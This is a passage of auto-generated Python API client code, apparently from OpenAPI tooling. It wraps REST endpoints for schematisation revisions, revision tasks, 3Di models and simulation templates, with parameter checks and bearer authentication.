path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/{id}/', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionTask', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_tasks_read(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_read # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_read(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_read_with_http_info(id, revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_tasks_read_with_http_info(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_read # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_read_with_http_info(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionTask, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_read" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_tasks_read`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_read`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_read`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/{id}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionTask', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_tasks_update(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_update # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_update(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_update_with_http_info(id, revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_tasks_update_with_http_info(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_update # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_update_with_http_info(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionTask, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_tasks_update`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_update`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_tasks_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/{id}/', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionTask', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_threedimodels(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_threedimodels # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_threedimodels(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[ThreediModel]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_threedimodels_with_http_info(id, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_threedimodels_with_http_info(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_threedimodels # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_threedimodels_with_http_info(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[ThreediModel], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_threedimodels" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_threedimodels`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_threedimodels`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/threedimodels/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ThreediModel]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_update(self, id, data, **kwargs): # noqa: E501
"""schematisations_update # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_update(id, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param Schematisation data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Schematisation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_update_with_http_info(id, data, **kwargs) # noqa: E501
def schematisations_update_with_http_info(self, id, data, **kwargs): # noqa: E501
"""schematisations_update # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_update_with_http_info(id, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param Schematisation data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Schematisation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{id}/', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Schematisation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def simulation_templates_create(self, data, **kwargs): # noqa: E501
"""Create a (optionally cloned) simulation template from the given simulation. # noqa: E501
A simulation template is actually nothing more than a simulation with a special status. It's immutable after creation and only can be used to create new simulations. Simulations 'upgraded' to simulations templates can't be directly run. The 'from_template' endpoint allows to create a new simulation from a template in a runnable state. A simulation template can be changed by first creating a simulation from it with 'from_template'. Changing that simulation and use this endpoint to 'upgrade' it to a simulation template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_create(data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param CreateTemplate data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Template
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulation_templates_create_with_http_info(data, **kwargs) # noqa: E501
def simulation_templates_create_with_http_info(self, data, **kwargs): # noqa: E501
"""Create a (optionally cloned) simulation template from the given simulation. # noqa: E501
A simulation template is actually nothing more than a simulation with a special status. It's immutable after creation and only can be used to create new simulations. Simulations 'upgraded' to simulations templates can't be directly run. The 'from_template' endpoint allows to create a new simulation from a template in a runnable state. A simulation template can be changed by first creating a simulation from it with 'from_template'. Changing that simulation and use this endpoint to 'upgrade' it to a simulation template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_create_with_http_info(data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param CreateTemplate data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Template, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulation_templates_create" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `simulation_templates_create`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulation_templates/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Template', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def simulation_templates_delete(self, id, **kwargs): # noqa: E501
"""simulation_templates_delete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this template. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulation_templates_delete_with_http_info(id, **kwargs) # noqa: E501
def simulation_templates_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""simulation_templates_delete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this template. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulation_templates_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `simulation_templates_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulation_templates/{id}/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def simulation_templates_list(self, **kwargs): # noqa: E501
"""simulation_templates_list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name:
:param str name__iexact:
:param str name__contains:
:param str name__icontains:
:param str name__in: Multiple values may be separated by commas.
:param str name__startswith:
:param str name__istartswith:
:param str name__endswith:
:param str name__regex:
:param str uuid:
:param str uuid__iexact:
:param str uuid__contains:
:param str uuid__icontains:
:param str uuid__in: Multiple values may be separated by commas.
:param str uuid__startswith:
:param str uuid__istartswith:
:param str uuid__endswith:
:param str uuid__regex:
:param str created__date:
:param str created__date__gt:
:param str created__date__gte:
:param str created__date__lt:
:param str created__date__lte:
:param float created__year:
:param float created__year__gt:
:param float created__year__gte:
:param float created__year__lt:
:param float created__year__lte:
:param float created__month:
:param float created__month__lte:
:param float created__day:
:param float created__day__lt:
:param float simulation__threedimodel__id:
:param float simulation__threedimodel__id__range: Multiple values may be separated by commas.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2004
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulation_templates_list_with_http_info(**kwargs) # noqa: E501
def simulation_templates_list_with_http_info(self, **kwargs): # noqa: E501
"""simulation_templates_list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name:
:param str name__iexact:
:param str name__contains:
:param str name__icontains:
:param str name__in: Multiple values may be separated by commas.
:param str name__startswith:
:param str name__istartswith:
:param str name__endswith:
:param str name__regex:
:param str uuid:
:param str uuid__iexact:
:param str uuid__contains:
:param str uuid__icontains:
:param str uuid__in: Multiple values may be separated by commas.
:param str uuid__startswith:
:param str uuid__istartswith:
:param str uuid__endswith:
:param str uuid__regex:
:param str created__date:
:param str created__date__gt:
:param str created__date__gte:
:param str created__date__lt:
:param str created__date__lte:
:param float created__year:
:param float created__year__gt:
:param float created__year__gte:
:param float created__year__lt:
:param float created__year__lte:
:param float created__month:
:param float created__month__lte:
:param float created__day:
:param float created__day__lt:
:param float simulation__threedimodel__id:
:param float simulation__threedimodel__id__range: Multiple values may be separated by commas.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2004, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'name__iexact',
'name__contains',
'name__icontains',
'name__in',
'name__startswith',
'name__istartswith',
'name__endswith',
'name__regex',
'uuid',
'uuid__iexact',
'uuid__contains',
'uuid__icontains',
'uuid__in',
'uuid__startswith',
'uuid__istartswith',
'uuid__endswith',
'uuid__regex',
'created__date',
'created__date__gt',
'created__date__gte',
'created__date__lt',
'created__date__lte',
'created__year',
'created__year__gt',
'created__year__gte',
'created__year__lt',
'created__year__lte',
'created__month',
'created__month__lte',
'created__day',
'created__day__lt',
'simulation__threedimodel__id',
'simulation__threedimodel__id__range',
'limit',
'offset'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulation_templates_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'name__iexact' in local_var_params and local_var_params['name__iexact'] is not None: # noqa: E501
query_params.append(('name__iexact', local_var_params['name__iexact'])) # noqa: E501
if 'name__contains' in local_var_params and local_var_params['name__contains'] is not None: # noqa: E501
query_params.append(('name__contains', local_var_params['name__contains'])) # noqa: E501
if 'name__icontains' in local_var_params and local_var_params['name__icontains'] is not None: # noqa: E501
query_params.append(('name__icontains', local_var_params['name__icontains'])) # noqa: E501
if 'name__in' in local_var_params and local_var_params['name__in'] is not None: # noqa: E501
query_params.append(('name__in', local_var_params['name__in'])) # noqa: E501
if 'name__startswith' in local_var_params and local_var_params['name__startswith'] is not None: # noqa: E501
query_params.append(('name__startswith', local_var_params['name__startswith'])) # noqa: E501
if 'name__istartswith' in local_var_params and local_var_params['name__istartswith'] is not None: # noqa: E501
query_params.append(('name__istartswith', local_var_params['name__istartswith'])) # noqa: E501
if 'name__endswith' in local_var_params and local_var_params['name__endswith'] is not None: # noqa: E501
query_params.append(('name__endswith', local_var_params['name__endswith'])) # noqa: E501
if 'name__regex' in local_var_params and local_var_params['name__regex'] is not None: # noqa: E501
query_params.append(('name__regex', local_var_params['name__regex'])) # noqa: E501
if 'uuid' in local_var_params and local_var_params['uuid'] is not None: # noqa: E501
query_params.append(('uuid', local_var_params['uuid'])) # noqa: E501
if 'uuid__iexact' in local_var_params and local_var_params['uuid__iexact'] is not None: # noqa: E501
query_params.append(('uuid__iexact', local_var_params['uuid__iexact'])) # noqa: E501
if 'uuid__contains' in local_var_params and local_var_params['uuid__contains'] is not None: # noqa: E501
query_params.append(('uuid__contains', local_var_params['uuid__contains'])) # noqa: E501
if 'uuid__icontains' in local_var_params and local_var_params['uuid__icontains'] is not None: # noqa: E501
query_params.append(('uuid__icontains', local_var_params['uuid__icontains'])) # noqa: E501
if 'uuid__in' in local_var_params and local_var_params['uuid__in'] is not None: # noqa: E501
query_params.append(('uuid__in', local_var_params['uuid__in'])) # noqa: E501
if 'uuid__startswith' in local_var_params and local_var_params['uuid__startswith'] is not None: # noqa: E501
query_params.append(('uuid__startswith', local_var_params['uuid__startswith'])) # noqa: E501
if 'uuid__istartswith' in local_var_params and local_var_params['uuid__istartswith'] is not None: # noqa: E501
query_params.append(('uuid__istartswith', local_var_params['uuid__istartswith'])) # noqa: E501
if 'uuid__endswith' in local_var_params and local_var_params['uuid__endswith'] is not None: # noqa: E501
query_params.append(('uuid__endswith', local_var_params['uuid__endswith'])) # noqa: E501
if 'uuid__regex' in local_var_params and local_var_params['uuid__regex'] is not None: # noqa: E501
query_params.append(('uuid__regex', local_var_params['uuid__regex'])) # noqa: E501
if 'created__date' in local_var_params and local_var_params['created__date'] is not None: # noqa: E501
query_params.append(('created__date', local_var_params['created__date'])) # noqa: E501
if 'created__date__gt' in local_var_params and local_var_params['created__date__gt'] is not None: # noqa: E501
query_params.append(('created__date__gt', local_var_params['created__date__gt'])) # noqa: E501
if 'created__date__gte' in local_var_params and local_var_params['created__date__gte'] is not None: # noqa: E501
query_params.append(('created__date__gte', local_var_params['created__date__gte'])) # noqa: E501
if 'created__date__lt' in local_var_params and local_var_params['created__date__lt'] is not None: # noqa: E501
